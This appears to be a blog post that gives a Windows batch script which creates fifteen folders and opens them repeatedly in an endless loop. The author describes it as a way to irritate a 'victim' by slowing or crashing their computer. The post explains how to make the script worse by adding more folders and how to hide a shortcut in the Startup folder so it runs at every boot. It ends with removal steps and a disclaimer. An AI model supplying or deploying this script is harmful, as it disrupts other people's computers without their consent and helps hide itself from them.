In this post,i am going to show you some codes,which will create folders some limited on its own and open it automatically.
Well,this can be quiet irritating for your victim as when ever this code
is executed on your victim computer,it will make limited number of
folders but will open them continuously which will result in slowing
down the system or even sometimes the system will crash.
Copy paste the below code in notepad and save it with "anyname
.bat".
@echo off
:RON
md CYBERTECH1
md CYBERTECH2
md CYBERTECH3
md CYBERTECH4
md CYBERTECH5
md CYBERTECH6
md CYBERTECH7
md CYBERTECH8
md CYBERTECH9
md CYBERTECH10
md CYBERTECH11
md CYBERTECH12
md CYBERTECH13
md CYBERTECH14
md CYBERTECH15
start CYBERTECH1
start CYBERTECH2
start CYBERTECH3
start CYBERTECH4
start CYBERTECH5
start CYBERTECH6
start CYBERTECH7
start CYBERTECH8
start CYBERTECH9
start CYBERTECH10
start CYBERTECH11
start CYBERTECH12
start CYBERTECH13
start CYBERTECH14
start CYBERTECH15
goto RON
NOTE: Save the above code in using notepad with ".bat" extension.
TIPS:To make the above code work more worse,add more
number of folders by adding command "md foldername_" where "_"
represents any number which you want to give or you can give your custom
name also by replacing "CYBERTECH_" where "_" is any number at the
end of folder name.Just make sure that if you give custom name to the
folder which will be created in future,please put the "start
foldername_" command also so that it can be opened after being created.
Also you can make shortcut of this bat file and save it in
"Startup"
and hide it along with its original bat files,so whenever the computer
starts,this bat file will be executed result in irritating your victim
as your victim won't be able to do their work.
If you have placed the shortcut of above bat files,you might observe
that when ever the computer starts,this bat file is executed,to make
everything work as it was before execution of this trick,boot your
system in safe node,browse to your startup folder,if you have hided this
bat file then first go in control panel>folder option>view and
then tick the option" show hidden files and folder and drives",then come
back to startup folder and delete the bat file or its shortcut.By doing this,whenever your computer will start,it will work fine as it used to do before.
Please don't forget to share this information with your friends.
NOTE:ABOVE
INFORMATION AND SOURCE CODE IS FOR EDUCATION AND SECURITY PURPOSE
ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING
UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR
WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO
YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE
RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.
Comments
Post a Comment